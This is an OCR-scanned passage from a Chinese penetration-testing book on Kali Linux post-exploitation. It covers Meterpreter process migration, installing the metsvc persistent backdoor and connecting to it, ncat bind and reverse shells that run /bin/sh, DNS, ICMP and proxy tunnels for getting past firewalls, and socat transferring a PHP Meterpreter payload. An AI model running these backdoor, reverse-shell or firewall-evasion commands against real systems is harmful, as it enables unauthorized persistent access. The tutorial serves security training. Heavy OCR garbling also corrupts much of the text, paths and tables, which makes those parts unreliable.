在 要 局 用 metsvc 后 [ 门 ， 您 首先 要 利用 被 测 系统 的 漏洞 获取 
Meterpreter shell。 在 获得 shell 之 后 ， 最 好 使 用 migrate 指令 把 当前 会 话 
( session ) 嫁接 到 其 他 进程 里 ， 例 如 explorer.exe(2)。 这 样 ， 即 使 
payload (1) 程序 意外 停止 ， 您 仍然 持 有 被 测 系 统 的 控制 权 LA 
11.9) 。 


PID PPID Name Arch Session User Path 

9 e [System Process] 4294967295 

a G System x86 

136 1308 ctfmon.exe x86 THE -F4C6GDD36CA\ C:\WINDOWS\system32\ct fmon.exe 

186 556 alg.exe x86 C:\WINDOWS\System32\alg.exe 

328 4 snss.exe x86 NT AUTHORITY\SYSTEM \Syst emRoot \System32\smss . exe 

340 924 wsentfy.exe x86 THE -F4C66DD36CA* C:\WINDOWS \system32\wscnt fy .exe 

480 328 csrss.exe x86 NT AUTHORITY\SYSTEM \??\C: \WINDOWS\system32\csrss.exe 
504 328 winlogon.exe x86 NT AUTHORITY\SYSTEM \??\C: \WINDOWS\system32\winlogon.exe 
556 564 services.exe x86 NT AUTHORITY\SYSTEM : \WINDOWS\system32\services.exe 
568 504 lsass.exe x86 NT AUTHORITY\SYSTEM >: \WINDOWS \system32\Lsass.exe 

748 556 VBoxService.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\VBoxService.exe 


788 556 svchost.exe x86 
860 556  svchost.exe x86 
924 556  svchost.exe x86 
972 556 svchost .exe x86 


:NWINDOWSNsystem32Nsvchost .exe 
: WINDOWS \System32\svchost .exe 


C 
C 
C 
NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe 
C 
C 
C:NW MINDOMEN a rers pria exe 


NT AUTHORITY\SYSTEM 


Q 
explorer.exe 


"n ( 

0 25 Spoolsv.exe x80 Ü EM PN em32\spoolsv .exe 

1444 556 scardsvr.exe x86 C: WINDONS System32\SCardSvr.exe 

1664 556 svchost .exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost .exe 
c 


1964 1308 VBoxTray.exe x86 


THE - Fac SETOSA 2: WINDOWS | ray.exe 
X E o exe 


OP OOO GOP ©20°0909000009009°0°0O 


THE -F4C6 TENY \user C:\Documents end. SettingsN user\Desktop\met -back .exe 


met -back.exe 


图 11.9 
接 下 来 ， 我 们 使 用 下 述 指令 安装 metsvc 服 务 。 
run metsvc 


上 述 指 令 的 运行 结果 如 图 11.10 所 示 。 


Imeterpreter > run metsvc 
*] Creating a meterpreter service on port 31337 
*] Creating a temporary installation directory C:\DOCUME~1\user\LOCALS~1\Temp\hFSGPuffumYt... 
*] »» Uploading metsrv.x86.dll... 

] »» Uploading metsvc-server.exe... 
*] »» Uploading metsvc.exe... 

] Starting the service... 

* Installing service metsvc 


一 一 一 一 一 一 


* Starting service 
Service metsvc successfully installed. 


meterpreter > 


图 11.10 
现在 我 们 在 被 测 主 机 上 打开 文件 夹 CADocuments and 
Settings\user\Local Settings\Temp\ hFSGPuffumYt， 可 在 其 中 找到 后 门 程 
序 的 文件 〈 见 图 11.11) 。 


fe hFSGPuffumyYt 
Fie Edt View Favorites Tools Help 
Ou- O- FL 
Address |C) C:\Documents and Settings\user\Local Settings| TemplhFSGPuffumYt 
Folders x Name = Size Type Date Modified 
Documents and Settings A Xmetsrv.di 751KB Application Extension 27/12/2013 22:24 
© All Users Pl) metsve.exe 60 KB Application 27/12/2013 22:25 


© user [E ]metsvc-server.exe 44KB Application 27/12/2013 22:25 
LJ Cookies 


O Desktop 
X Uf Favorites 


= CI Local Settings 
* C) Apps 
+ BD) History 
= C Temp 
* ©) MEI12842 
$ O MEI18762 
C database 
CJ heSGPuffumvt v 


» < 


图 11.11 
这 个 目录 里 有 metsvc 的 EXE 文 件 和 DLL 文件 。 现 在 我 们 重新 启动 被 
测 主 机 ， 来 检验 一 下 这 个 后 门 是 否 会 在 局 动 时 目 动 加 载 。 
我 们 在 测试 主机 上 启动 会 话 处 理 程序 ， 并 设 定 metsvc payload 的 选 
项 ( 见 图 11.12) 


e RHOST: 192.168.2.21 (被 测 主机 ) : 
eLPORT: 31337 〈 后 门 程序 的 端口 号 码 ) 。 


msf exploit(handler) > show options 


Module options (exploit/multi/handler) : 


Payload options (windows/metsvc bind tcp): 


Name Current Setting Required Description 

EXITFUNC process yes Exit technique (accepted: seh, thread, process, none) 
LPORT 31337 yes The listen port 

RHOST 192.168.2.22 no The target address 


Exploit target: 
Id Name 


© Wildcard Target 


11.12 
设置 好 各 选项 之 后 ， 我们 使 用 execute 指 令 发 起 攻击 (WA 
11.13) 。 
msf exploit(handler) > exploit 


[*] Started bind handler 
[*] Starting the payload handler... 
[*] Meterpreter session 3 opened (192.168.2.22:47828 -» 192.168.2.21:31337) at 2013-12-27 23:20:50 «0700 


图 11.13 
上 述 信 息 表 明 ， 测 试 主机 发 起 的 攻击 已 经 成 功 ; 我们 再 次 获取 到 
了 被 测 主机 的 Meterpreter 会 话 。 此 后 ， 您 可 在 这 个 会 话 里 为 所 欲 为 。 
如 需 在 被 测 主机 上 外 载 metsvc 服务 ， 您 需要 在 Meterpreter shell 里 
使 用 以 下 指令 。 


run metsvc -r 


XIE RT USE metsvc TE ° 


11.2 隧道 工具 


在 计算 机 领域 里 ， 隧 道 是 指使 用 某 个 网 络 协议 封 靖 另 外 一 种 网 络 
协议 的 技术 手段 。 在 渗透 测试 中 ， 使 用 隧道 技术 主要 为 了 让 日 标 系统 
的 防护 机 制 无 法 发 挥 作用 。 多 数 情况 下 ， 日 标 系 统 的 防火 墙 会 阻止 内 
部 系统 访问 外 网 网 络 ， 只 放行 DNS、HTTP 和 HTTPS 这 类 的 常见 网 络 协 
议 。 在 这 种 情况 下 ， 如 果 要 在 目标 系统 的 内 网 使 用 外 网 的 其 他 网 络 协 
议 ， 就 需要 构建 HTTP 协 议 的 隧道 。 这 样 ， 防 火 墙 就 会 放行 隧道 封装 的 
数据 。 

Kali Linux 收录 了 几 款 隧道 封装 工具 ， 以 把 某 种 协议 的 数据 藏 在 其 
他 协议 之 中 。 下 文 将 会 介绍 部 分 隧道 封装 工具 。 

11.2.1 dns2tcp 


dns2tcp 是 一 种 把 TCP 数 据 包 伪装 为 DNS 协议 数据 包 的 隧道 封装 工 
具 。 它 适用 于 目标 主机 只 能 发 送 DNS 请 求 的 网 络 环境 。 当 它 在 特定 端 
口 受 理 连 接 请 求 时 ， 它 会 数据 封 洲 为 DNS 协 议 的 格式 ， 再 发 送 到 指定 
主机 的 指定 端口 的 dns2tcp 服 务 端 程序 。 

dns2tcp 采 用 了 CS (E P9m/ HR ar) FRR o TP e Ae UH ek 
dns2tcpc， 服 务 器 端 叫 做 dns2tcpd。 

要 局 动 dns2tcp 的 服务 器 端 程序 ， 可 在 终端 中 使 用 下 述 指令 。 

# dns2tcpd 

上 述 指 令 将 会 在 屏幕 上 显示 简短 的 使 用 说 明 。 

如 需 使 用 dns2tcp 的 客户 端 程序 ， 可 在 终端 中 使 用 下 述 指令 。 

# dns2tcpc 

上 述 指令 将 会 在 屏幕 上 显示 简短 的 使 用 说 明 。 

在 使 用 dns2tcp 之 前 ， 需 要 创建 一 个 指 疝 公 网 dns2tcp 服务 器 IP 的 
NS 记录 。 建 议 为 dns2tcp 的 程序 分 配子 域名 的 DNS 记录 ， 例 如 


dnstimnel.myexample.com ° 


EARMA dns2tcp 服务 器。 默认 情况 下 ，dns2tcp ARB zi vmi f 
序 会 在 当前 用 户 的 主 目录 下 寻找 文件 .dns2tcprcd， 将 之 用 作 配 置 文件 。 
我 们 使 用 以 下 内 容 创建 一 个 标准 的 dns2tcp 服 务 器 端 配置 文 件 。 
listen = 0.0.0.0 
port = 53 


user = nobody 
chroot = /tmp 
domain = dnstunnel.example.com 
resources = ssh:127.0.0.1:22 
然后 把 这 个 文件 保存 为 /etc/dns2tcpd.conf 。 
创建 好 配置 文件 之 后 ， 可 通过 下 述 指 令 启动 dns2tcp 的 服务 句 端 程 
序 。 
# dns2tcpd -F -d 1 -f /etc/dns2tcpd.conf 
上 述 指令 将 dns2tcpd 的 调试 级 别 设置 为 1(-d 1)， 并 令 其 在 前 台 运 行 
(-F) ° 
dns2tcp 的 客户 端 程序 同样 需要 进行 配置 。 您 可 用 以 下 述 内 容 创建 
一 个 客户 端 应 用 程序 的 配置 文件 。 


domain = dnstunnel.example.com 


ressource = ssh 

local. port = 2222 

isles MN -] 

将 这 个 配置 文件 保存 为 /etc/dns2tcpc.conf ， 或 保存 为 文 
件 .dns2tcprc。 这 样 ， 我 们 束 可 在 执 Jdem 时 用 配置 文件 提供 参 
数 ， 而 不 必 在 每 次 执行 程序 的 时 候 都 通过 很 长 的 命令 行 指令 传递 程序 
TW o 

接 下 来 ， 使 用 以 下 指令 启动 隧道 的 客户 端 程序 。 


# dns2tcpc —z dnstunnel.example.com -c -f /etc/dns2tcpc.conf 


Ve 3 


而 且 要 用 下 述 命令 开局 SSH 会 话 。 
# ssh -p 2222 yourname@127.0.0.1 
dns2tcp 程 序 能 够 以 DNS 协议 封装 数据 包 ， 但 是 它 的 隧道 并 不 具备 
加 密 功 能 。 因 此 ， 您 可 能 需要 对 进入 协议 隧道 前 的 数据 包 进 行 加 密 处 
He 
11.2.2 iodine 


iodine 是 一 款 能 够 将 IPv4 的 网 络 流量 封装 为 DNS 协议 的 工具 。 它 特 
别 适 用 于 目标 主机 只 能 发 送 DNS 请 求 的 网 络 环境 。 

与 其 他 DNS 隧道 工具 相 比 ，iodine 具 备 以 下 优势 : 

e 在 处 理 下 行 数据 时 ， 它 可 以 对 不 其 编码 ， 所 以 iodine 的 性 能 更 为 
mf; 

e 支持 多 种 操作 系统 ， 它 可 以 在 Linux ` Mac OS ` FreeBSD ` 
NetBSD ` OpenBSD 和 Windows 系 统 上 运行 ; 

e 它 可 用 密码 保护 通信 隧道 ; 

o 最 多 支持 16 个 并 发 连接 。 

在 使 用 这 个 程序 之 前 ， 您 需要 准备 以 下 条 件 : 

e 使 用 尽 可 能 短 的 域名 ， 域 名 越 短 ， 隧 道 的 带宽 消耗 束 越 小 ; 

e 能 够 管理 某 个 域 的 A 记录 和 NS 记录 ; 

e 如 果 要 通过 Internet 将 iodine 的 客户 端 程序 连接 到 其 服务 器 端 程 
序 ， 那 么 运行 服务 器 端 程序 的 主机 应 当 具 备 独 立 的 公 网 了 P; 

e 客户 端 程序 能 够 通过 隧道 连接 到 互联 网 。 

在 准备 好 上 述 事 宜 之 后 ， 束 要 分 别 配置 DNS 服务 器 、iodine 服 务 端 
和 窗户 端 。 

1. 配置 DNS 服务 器 

如 有 果 您 拥有 某 个 域 (example.com) ， 那 么 可 以 给 这 个 隧道 分 配 一 
个 子 域 (例如 tunnel.example.com) 。 如 果 这 个 域 的 名 称 解 析 服 务 器 使 


用 BIND 程 序 解析 DNS， 那 么 您 可 以 在 example.com 的 区 域 文 件 (zone 
file) 里 添加 以 下 2 ÍF ° 


dns IN A 192.168.200.1 
tunnel IN NS dns.example.com. 
上 述 两 行 的 作用 是 : 


e 1557 — 1 44 Ndns 的 A IR; 

e 名 为 dns.example.com 的 DNS AKA as f 3 fe prtunnel FEX ° 

其 中 ，192.168.200.1 是 iodine 服 务 端 主机 使 用 的 IP 地 址 。 

在 修改 了 区 域 文件 (zone file) 之 后 ， 重 启 BIND 服务 端 程序 以 使 
配置 生效 。 

2. aed ETI {Tiodine 

以 服务 器 端 模式 启动 iodine 程 序 的 指令 如 下 。 

iodined -f —c —P password 192.168.200.1 tunnel.example.com 

上 述 指令 的 各 选项 的 意思 如 下 。 

e-f: 以 前 台 模 式 运行 服务 器 端 程序 。 

e-P: 指定 服务 器 端 程序 所 用 的 密码 。 

e-C: 仪 用 客户 端 地 址 检查 。 

3. Pm rVIS TTiodine 

以 客户 端 模式 运行 iodine 程 序 ， 只 需要 指定 1 一 2 个 参数 。 第 一 个 参 
数 是 本 地 DNS 服务 器 (可 选 ) ， 第 二 个 参数 是 隧道 使 用 的 域名 (本 例 
中 ， 这 个 域 是 tunnel.example.com) 。 

以 客户 端 模式 启动 iodine 程 序 的 指令 如 下 。 

iodine -f —P password tunnel.example.com 

ARH ae ving EDL SS or BOIS TE P 3m EL ANPE © XSI HOLE AS 
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在 测试 隧道 连接 时 ， 可 以 ping 隧 道 对 端的 卫 地 址 。 

可 以 在 客户 端 主机 上 使 用 以 下 指令 。 


ping 192.168.200.1 

可 以 在 服务 絮 端 主机 上 使 用 以 下 指令 。 

ping 192.168.200.2 

你 可 能 需要 实际 情况 调整 指令 中 的 IP 地 址 。 
11.2.3 ncat 


neat 是 一 款 集 发 送 、 接 收 、 转 发 、 加 密 数 据 等 多 种 功能 于 一 身 的 

网 络 I HR 。 nat 是 # 名 的 Neta fe 序 
(http://nmap.org/ncat/guide/index.html) 的 改进 版 本 ， 它 的 功能 

e 它 可 用 作 Web 服务 程序 和 其 他 TCP/IP 服务 器 端 程序 的 简易 
TCP/UDP/SCTP/ SSL 客 户 端 ; 

e 它 可 用 作 简 单 的 TCP/UDP/SCTP/SSL 服务 器 端 程序 ; 

e 它 可 转发 或 代理 TCP/UDP/SCTP 流量 ; 

e 它 可 用 作 执 行 系统 指令 的 网 络 网 关 ; 

e 它 可 使 用 SSL 技术 加 密 通信 数据 ; 

e 它 可 使 用 IPv4 或 IPv6 进行 网 络 传输 ; 

e 它 可 用 作 连 接 代 理 (Connection Broker) ， 通 过 第 三 个 中 介 服 务 
名 使 两 个 (或 更 多 ) 的 客户 端 互联 互通 。 

因为 本 篇 讨论 的 是 在 目标 主机 上 创建 操作 系统 后 门 的 方法 ， 所 以 
仅 介 绍 ncat 与 后 门 有 关 的 功能 。 

首先 应 当 创 建 一 个 常规 的 backdoor shell。 我 们 以 监听 模式 启动 ncat 
程序 ， 并 指定 监听 的 网 络 端 口 。 当 攻击 人 员 连 接 到 主机 的 这 个 端口 
上 时， 就 能 够 获取 到 主机 的 shell 会 话 。 

在 本 例 中 ， 各 主机 使 用 的 IP 地 址 如 下 : 

e 攻击 人 员 的 IP 地 址 是 192.168.2.21; 

e 被 测 主 机 的 IP 地 址 是 192.168.2.23 ° 

接着 ， 我 们 在 被 测 主机 上 运行 下 述 指 令 。 


ncat -l 1337 —e /bin/sh 
Eo 令 各 选项 的 作用 分 别 如 下 。 
: 指定 监听 端口 。 

e-e: 指定 shell 的 执行 指令 

然后 ， 我 们 通过 下 述 命令 ， 使 攻击 人 员 的 主机 连接 到 被 测 主机 的 
backdoor shell ° 
ncat 192.168.2.23 1337 
如 图 11.4 所 示 ， 上 述 指令 将 连接 到 被 测 主机 的 shell。 


root@kali:~# ncat 192.168.2.23 1337 

id 

uid=1000(msfadmin) gid=1000(msfadmin) groups=4( adm) ,20(dialout) ,24(cdrom) ,25( floppy) ,29(audio) ,30(dip) ,44( 
ideo) ,46(plugdev) ,107( fuse) ,111(1lpadmin) ,112( admin) ,119(sambashare) ,1600(msfadmin) 
ifconfig 

etho Link encap:Ethernet  Hwaddr 08:00:27:43:15:18 

inet addr:192.168.2.23 Bcast:192.168.2.255 Mask:255.255.255.6 

inet6 addr: fe80::a00:27ff:fe43:1518/64 Scope:Link 

UP BROADCAST RUNNING MULTICAST MTU:1506 Metric:1 

RX packets:23753 errors:O dropped:O overruns:O frame:O 

TX packets:21364 errors:O dropped:O overruns:@ carrier:G@ 

collisions:O txqueuelen:1000 

RX bytes:18165440 (17.3 MB) TX bytes:2430545 (2.3 MB) 

Base address:O0xd010 Memory :f0000000 - f0020000 


图 11.14 

下 面 ， 我 们 将 在 被 测 主 机 上 创建 reverse shell， 使 其 自主 连接 到 攻 
di ADBJESLE » 

我 们 首先 要 在 攻击 人 员 的 主机 上 配置 ncat 程 序 ， 让 它 监 听 1337 端 
O o 

ncat -] 1337 

接 下 来 ， 我 们 在 被 测 主机 上 执行 下 述 指令 。 

ncat 192.168.2.21 1337 —e /bin/sh 

执行 完 这 个 指令 之 后 ， 我 们 就 可 在 攻击 人 员 的 测试 主机 上 看 到 图 
11.15 的 信息 。 


kali:~# ncat -l 1337 


id 
uid-1000(msfadmin) gid-1000(msfadmin) groups-4(adm),20(dialout),24(cdrom) ,25( floppy) ,29( audio) ,30(dip) ,44(v| 
ideo),46(pluadev),107(fuse),111(lpadmin),112(admin),119(sambashare) , 1600 (msfadmin) 


图 11.15 
可 随时 使 用 组 合 键 Ctrl+C 退出 backdoor shell ° 


应 当 注 意 的 是 ， 上 述 两 个 例子 并 没有 对 网 络 流量 进行 加 密 处 理 。 
如 果 需 要 加 密 网 络 数据 ， 束 应 当 使 用 cryptcat 程 序 。 在 使 用 cryptcat 时 ， 
务必 要 在 通信 的 两 端 使 用 -k 远 项 设置 加 密 密 码 ， 否 则 它 将 使 用 默认 密码 
进行 加 密 。 


11.2.4 proxychains 


proxychains 程 序 可 强制 TCP 客 户 端 程序 通过 指定 的 代理 服务 器 (或 
代理 链 ) 发 起 TCP 连 接 。 自 3.1 版 本 起 ， 它 支持 SOCKS4 代 理 、 
SOCKET5 代 理 和 基于 CONNECT 模 式 的 HTTP 代 理 服务 器 。 

proxychains 的 文档 介绍 了 它 的 各 种 用 途 : 

e 适用 于 通过 代理 服务 絮 访 问 外 部 网 络 的 情况 ; 

e 可 用 于 穿越 限制 外 联 端 口 的 防火 墙 (出 口 过 滤 ) ， 

e 可 将 2 个 (或 更 多 ) 代理 服务 器 组 成 代理 服务 器 链 ; 

e 可 以 让 本 身 不 文 持 代理 的 程序 使 用 代理 服务 器 ， 例 如 Telnet、 
Weet ` FTP ` VNC 和 Nmap 程 序 ， 它 们 都 是 直接 发 起 连接 的 程序 ; 

e 可 以 通过 反 回 代理 服务 釉 从 网 络 外 部 访问 内 网 。 

如 需 启动 proxychains 程 序 ， 可 在 终端 中 使 用 下 壕 指 令 。 

# proxychains 

上 述 指 令 将 会 在 屏幕 上 显示 简单 的 使 用 说 明 。 

在 Kali Linux 中 ，proxychains 的 配置 文件 是 /etc/proxychains.conf ° 
默认 情况 下 它 使 用 的 代理 服务 器 是 tor。 如 需 使 用 其 他 代理 服务 器 ， 可 
在 配置 文件 的 最 后 部 分 声明 需要 添加 的 代理 服务 器 。 

本 例 所 使 用 的 配置 文件 ， 其 最 后 的 代理 服务 器 声明 部 分 的 内 容 如 
TBI S 

[ProxyList] 


# add proxy here ... 


4 meanwile 


# defaults set to "tor" 
socks4 127.0.0.1 9050 
声明 代理 服务 需 的 格式 如 下 所 示 。 
proxy. type host port [user pass] 
代理 服务 器 类 型 即 http、socks4 或 socks5。 
如 果 要 使 Telnet 程 序 通过 代理 服务 器 建立 连接 ， 可 使 用 下 述 指令 。 
# proxychains telnet example.com 
上 述 指 令 将 使 telnet 程序 通过 (proxychians 配置 文件 指定 的 ) 代理 
服务 器 登录 到 example.com 的 telnet 服 务 。 


11.2.2 ptunnel 


ptunnel zé— 3X4 FAICMP ping (请 求 和 回复 ) STOP 连接 的 隧道 
工具 。 即 使 被 测 主机 无 法 向 Internet 发 送 任何 TCP 和 UDP 的 数据 ， 只 
它 可 以 向 取 Internet 发 起 ping 指 令 ， 那 么 这 款 工 具 就 可 以 帮助 它 穿 越 防 
火场 。ptunnel 可 以 脱离 TCP 和 UDP 连接 访问 E-mail、 上 网 或 进行 其 他 网 
络 活动 。 

如 需 启 动 ptunnel 程 序 ， 可 在 终端 中 使 用 下 述 指 令 。 

# ptunnel -h 

ult S PEE TEBERE E fon Tal D) f FREUE UTOR YD o 

需要 配合 代理 服务 器 才 能 在 客户 端 使 用 ptunnel 程 序 。 而 且 客户 端 
程序 所 在 的 主机 必须 能 够 访问 服务 器 端的 主机 。 另 外 ， 如 果 要 在 
Internet 上 架设 ptunnel 服 务 器 端 程序 ， 那 么 服务 器 端 主机 必须 使 用 公 网 
可 以 直接 访问 到 的 耳 地 址 。 

在 此 之 后 ， 可 通过 下 述 指令 局 动 ptunnel 的 服务 器 端 程序 。 

# ptunnel 

服务 器 端 程序 将 会 监听 所 有 的 TCP 协 议 的 数据 包 。 

[inf]: Starting ptunnel v 0.71. 


[inf]: (c) 2004-2009 Daniel Stoedle, <daniels@cs.uit.no> 


[inf]: Security features by Sebastien Raveau, <sebastien.raveau 


@epita.fr> 


[inf]: Forwarding incoming ping packets over TCP. 
[inf]: Ping proxy is listening in privileged mode. 


本 例 中 ， 客 户 端 要 把 本 机 的 2222 端口 的 通信 经 由 ptunnel 服务 器 


端 ( ptunnel. example.com) 转发 到 ssh 服 务 器 (ssh.example.org) 的 22 端 


[Jo 


创建 这 样 一 个 定向 通信 隧道 的 指令 如 下 。 

# ptunnel -p ptunnel.example.com -lp 2222 -da ssh.example.org -dp 22 
客户 端 将 会 显示 如 下 信息 。 

[inf]: Starting ptunnel v 0.71. 

[inf]: (c) 2004-2009 Daniel Stoedle, <daniels@cs.uit.no> 


[inf]: Security features by Sebastien Raveau, <sebastien.raveau@ 


epita.fr> 


码 b 
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[inf]: Relaying packets from incoming TCP streams. 

然后 ， 让 SSH 连 接 到 ptunnel 程 序 形成 的 隧道 。 

# ssh localhost -p 2222 
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此 外 ， 您 可 以 在 服务 器 端 运 行 的 命令 行 里 通过 选项 -x 指 定 隧 道 的 密 
这 样 就 可 以 防止 其 他 人 使 用 您 的 ptunnel 隧 道 。 当 然 ， 客 户 问 和 服 
问 应 当 使 用 相同 的 密码 。 


11.2.6 socat 
socat 程 序 是 一 款 使 用 两 个 独立 数据 通道 CCP) Oe Pe 


的 中 继 程 序 。 它 的 数据 通道 文 持 各 种 类 型 的 数据 接收 器 和 数据 源 ( 通 
称 为 地 址 类 型 [address type]) 。 地 址 类 型 可 以 是 以 下 某 个 〈 或 某 两 个 ) 
类 型 的 数据 对 象 : 


e 文件 ; 

e. 程序 ; 

e 文件 摘 述 符 ; 

e Socket (IPv4 ` IPv6 ` SSL ` TCP ` UDP 和 UNIX) ; 

e 设备 (WF` ET TUN/TAP 设备 ) ; 

e 管道 。 

以 上 每 种 数据 法 都 可 以 添加 各 种 参数 。 这 种 参数 可 以 是 锁定 模 
式 、 用 户 、 组 、 权 限 、 地 址 、 端 口 、 创 建 人 、 密 码 、 密 钥 等 数据 。 

其 官方 文档 表明 ，socat 程 序 的 工作 流程 分 为 4 个 阶段 。 

e 初始 化 阶段 : 在 第 一 阶段 ，socat 程序 要 解析 命令 行 里 的 选项 并 
初始 化 日 志 系 统 。 

e 建立 连接 阶段 : 在 第 二 阶段 ，socat 程序 会 依次 打开 第 一 ( 源 ) 
地 址 和 第 二 (目标 ) 地 址 。 因 为 必须 先 读 后 写 ， 所 以 如 果 不 能 打开 第 
一 个 地 址 ， 程 序 束 会 直接 退出 。 

e 数据 传输 阶段 ， 在 第 三 阶段 ，socat 程序 通过 select) KAUR fat P 
个 数据 通道 的 * 读 写 ” 文 件 描述 符 。 当 数据 源 地 址 可 读 且 目标 地 址 可 写 
时 ，socat 会 读 取 源 数据 ， 并 在 必要 的 时 候 进 行 换行 符 的 转换 ， 把 源 数 
据 写 到 男 外 一 个 数据 流 里 的 目标 文件 描述 符 里 ， 之 后 周而复始 。 

e 关闭 连 接 阶段 : 当 某 个 地 址 流 遇 到 了 EOF (正常 或 意外 终止 信 
号 ) ， 程 序 就 进入 了 第 四 阶段 。socat 会 在 另外 一 个 数据 流 里 传递 EFOF 
言 息 。 如 果 关 闭 连 接 后 ， 在 预定 的 时 间 范 围 内 ，socat 在 另外 一 个 方向 
仍然 在 传输 数据 ， 那 么 程序 将 关闭 所 有 数据 通道 并 停止 运行 。 

如 需 启 动 socat 程 序 ， 可 在 终端 中 执行 下 述 指令 。 


# socat -h 
上 述 指 令 将 在 屏幕 上 显示 命令 行 指令 的 各 个 选项 ， 以 及 可 选择 的 
地 址 类 型 。 


各 种 币 用 的 地 址 类 型 、 天 键 字 和 参数 的 有 天 介 绍 如 下 所 示 。 


地 址 类 型 


CREATE:«filename» 


EXEC:«command-line» 


FD:«fdnum» 


INTERFACE:«interface» 


IP4- 
SENDTO:<host>:<protocol> 


IP4-RECV:<protocol> 


OPEN:<filename> 


OPENSSL: <host>:<port> 


OPENSSL-LISTEN:<port> 


PIPE:<filename> 


TCP4:<host>:<port> 
TCP4-LISTEN:<port> 


有 关 介 绍 


使 用 creat () 方式 打开 文件 <filename>， 并 使 用 文件 描述 符 进行 写 
入 。 由 于 以 creat O 方式 打开 的 文件 可 写 不 可 读 ， 所 以 这 种 地 址 类 型 打 
开 的 是 必须 是 “只 可 写 ” 的 对 象 

这 个 指令 将 会 派生 出 一 个 子 进程 。 派 生 进程 会 与 父 进程 建立 通讯 ， 并 使 
用 execvp() 执 行 指定 的 程序 。<command- line> 就 是 普通 的 命令 行 
指令 ， 可 用 单 空 格 分 割 指 令 参 数 

使 用 文件 描述 符 <fdnum> 

发 送 原始 数据 的 、 链 路 级 别 的 网 络 接 口 。<interface> 应 为 网 卡 接口 的 
名 称 。 这 个 选项 只 对 Linux 系统 有 效 

创建 raw IP socket。 程 序 将 使 用 <protocol> 协 议 向 <host> 主 机 发 送 数 据 
E, 并且 只 会 处 理 指定 主机 的 数据 ， 忽 略 其 他 无 关 主 机 的 数据 包 。 如 果 指 定 
protocol 为 255， 它 将 使 用 raw socket， 把 IP header 也 当 作 数据 的 一 部 分 
建立 一 个 <protocol> 协 议 的 raw IP socket。 它 可 从 多 个 未 限定 的 对 端 
(peer) 接受 数据 ， 并 能 合并 数据 包 。 它 不 会 进行 任何 回复 。 如 果 指 定 
protocol 为 255， 它 将 使 用 raw socket, 把 IP header 也 当 作 数 据 的 一 部 分 
这 将 使 用 操作 系统 的 open() 方 法 打开 文件 <filename>。 这 个 选项 不 可 
用 于 UNIX 域 套 接 字 (UNIX domain socket) 

程序 将 于 主机 <host> 的 <port> 端 口 建立 SSL ERE. 它 可 根据 指定 的 地 
址 、 名 称 解析 ， 或 pf 选项 的 设置 自动 使 用 IPv4 2X IPv6 的 网 络 协议 
程序 将 监听 TCP 的 <port> 端 口 , 并 根据 pf 选项 的 设置 决定 采用 IPv4/6 
的 网 络 。 其 受理 连接 的 方式 与 SSL 服务 端 程序 一 致 

如 果 文 件 <filename> 事 前 存在 ， 那 么 程序 将 打开 这 个 文件 。 否 则 将 创 
建 并 打开 命名 管道 (named pipe) 

连接 主机 <host> 的 TCP<port> 端 口 


监听 主机 的 TCP <port> 端 口 以 受理 TCP/ IP 连接 


地 址 类 型 有 关 介 绍 


UDP4:<host>:<port> 连接 主机 <host> 的 UDP <port> 端 口 

UOPEHUUDPUNOSQEE 在 主机 的 UDP <port> 端 口 等 待 数据 。 如 果 收 到 数据 包 ， 将 与 发 包 主机 
建立 连接 

UDP4-SENDTO: <host>:<port> 将 使 用 UDPv4 协议 , 与 <host> 和 <port> 选 项 指定 的 对 端 进行 通信 。 È 
将 向 该 Socket 发 送 数据 ， 并 且 只 受理 该 socket 返回 的 数据 

UDP4-RECV:«port» 这 将 使 用 UDPv4 协议 在 主机 的 <port> 端 口 创 建 UDP socket。 它 可 从 多 
个 未 限定 的 对 端 〈peer) 接受 数据 ， 并 能 合并 数据 包 。 不 过 它 不 会 进行 
任何 回复 

UNIX-CONNECT:«filename» 将 以 UIXN 域 套 接 字 的 方式 连接 <filename>。 如 果 <filename> 不 存 


在 、<filename> 不 是 Unix 域 套 接 字 , 或 者 它 是 UNIX 域 套 接 字 而 没有 
对 应 的 监听 进程 ， 程 序 都 会 报错 


UNIX-LISTEN:<filename> 以 Unix domain stream socket 的 方式 监听 <file name>， 并 受理 连接 。 
如 果 <filename> 存 在 且 不 是 一 个 socket， 则 会 发 生 错 误 


UNIX-SENDTO:«filename» 以 UNIX domain datagram socket 的 形式 ， 与 <filename> 选 项 指定 的 对 
端 socket 进行 通信 。 它 将 向 该 Socket 发 送 数 据 ， 并 且 只 受理 对 端的 该 
socket 返回 的 数据 


UNIX-RECV:<filename> 创建 名 为 <filename> 的 UNIX domain datagram socket。 它 可 从 多 个 未 
指定 的 对 端 接受 数据 ， 并 将 数据 进行 合并 ， 不 过 它 不 会 进行 任何 回复 


后 续篇 幅 将 会 演示 socat 的 几 种 具体 应 用 。 

1. 获取 HTTP header 信息 

如 需 获 取 HTTP header 信息 ， 可 使 用 下 述 指令 。 
socat — TCP4:192.168.2.23:80 

HEAD / HTTP/1.0 

之 后 ，HTTP 服 务 器 端 程序 将 会 进行 回复 。 
HTTP/1.1 200 OK 

Date: Wed, 25 Dec 2013 15:27:19 GMT 

Server: Apache/2.2.8 (Ubuntu) DAV/2 
X-Powered-By: PHP/5.2.4-2ubuntu5.10 
Connection: close 

Content-Type: text/html 

2. 传输 文件 

要 从 主机 192.168.2.23 向 主机 192.168.2.23 发 送 文件 ， 需 要 以 下 几 


1. 在 主机 192.168.2.23 (接收 端 上 执行 下 述 指 令 。 

socat TCP4-LISTEN:12345 OPEN:php-meter.php,creat,append 

socat 程 序 将 会 监听 12345 端 口 。 如 果 没 有 php-meterphp 这 个 文件 ， 
socat 将 会 创建 该 文件 ;否则 将 会 将 传输 内 容 续 写 (append) 到 文件 的 
尾部 。 

2. 在 主机 192.168.22 (Aix) 上 执行 下 述 指 令 。 

cat php-meter.php | socat — TCP4:192.168.2.23:12345 

3. 在 接收 端 ， 我 们 可 以 通过 ls 指令 看 到 socat 程 序 创建 了 有 关 文 
人 

-rw-r--r-- 1 msfadmin msfadmin 1315 2013-12-25 10:34 php-meter. 
php 

上 述 信息 表明 ， 文 件 传输 成 功 ， 接 收 端 成 功 地 创建 了 有 关 文 件 。 


11.2.7 sslh 


sslh 是 SSL/SSH 协 议 的 端口 复 用 程序 。 它 在 指定 端口 受理 连接 ， 然 
后 根据 远程 客户 端 发 送 的 第 一 个 数据 包 识 别 应 用 程序 的 连接 类 型 ， 并 
将 之 转发 到 相应 的 服务 端 程序 。 

